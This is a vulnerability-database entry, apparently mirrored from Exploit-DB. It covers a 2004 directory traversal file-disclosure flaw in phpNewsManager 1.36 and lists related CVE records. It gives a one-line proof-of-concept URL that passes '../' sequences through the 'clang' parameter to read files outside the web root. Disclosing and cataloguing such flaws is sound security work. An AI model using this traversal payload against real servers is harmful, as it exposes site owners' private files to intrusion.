Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
exploitdbG00db0yEDB-ID:23742
HistoryFeb 23, 2004 - 12:00 a.m.

phpNewsManager 1.36 - functions Script File Disclosure

2004-02-2300:00:00
G00db0y
www.exploit-db.com
13

AI Score

7.4

Confidence

Low

JSON
source: https://www.securityfocus.com/bid/9720/info

phpNewsManager is prone to a file disclosure vulnerability. Remote attackers may submit malicious requests to the software that contain directory traversal sequences, potentially exposing sensitive resources outside of the hosting web server root.

http://www.example.com/functions.php?clang=../../../[existing_file]

Related

cve 1
nvd 1
cvelist 1
exploitdb 3
cve
cve
CVE-2004-0327
2004-11-23 05:00:00
nvd
nvd
CVE-2004-0327
2004-11-23 05:00:00
cvelist
cvelist
CVE-2004-0327
2004-03-18 05:00:00
exploitdb
exploitdb
PHP 4.x/5.x MySQL Library - 'Safe_mode' Filesystem Circumvention (2)
2002-02-03 00:00:00
PHP 4.x/5.x MySQL Library - 'Safe_mode' Filesystem Circumvention (1)
2002-02-03 00:00:00
PHP 4.x/5.x MySQL Library - 'Safe_mode' Filesystem Circumvention (3)
2002-02-03 00:00:00

AI Score

7.4

Confidence

Low

JSON
Related for EDB-ID:23742
cve1nvd1cvelist1exploitdb3